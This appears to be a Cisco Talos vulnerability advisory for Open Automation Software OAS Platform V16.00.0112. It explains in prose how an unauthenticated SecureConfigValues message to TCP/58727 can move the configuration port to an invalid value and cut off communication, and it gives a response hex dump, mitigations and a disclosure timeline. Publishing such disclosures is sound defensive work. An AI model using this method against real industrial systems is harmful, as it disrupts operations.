A denial of service vulnerability exists in the OAS Engine SecureConfigValues functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted network request can lead to loss of communications. An attacker can send a network request to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a properly-formatted unauthenticated configuration message to the OAS Platform, it is possible to change the port used for configuration changes. If the SecureConfigValues command is used to change the TCP Port parameter to an invalid value, the OAS Platform will stop listening for new configuration connections altogether. Invalid values consist of any port number outside of the available range (>65535) or any port already in use. By default this message can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

When a successful SecureConfigValues command is received, a response similar to the following will be returned:

    0000   00 00 00 00 00 80 44 40 00 01 00 00 00 ff ff ff   ......D@........
    0010   ff 01 00 00 00 00 00 00 00 11 01 00 00 00 02 00   ................
    0020   00 00 06 02 00 00 00 07 53 75 63 63 65 73 73 0a   ........Success.
    0030   0b                                                .
    

If either an invalid or in-use port was chosen, it will no longer be possible to communicate with the server. If a valid port that was not already in-use was chosen, communication will switch to that port.

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform, and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

Tag

#asus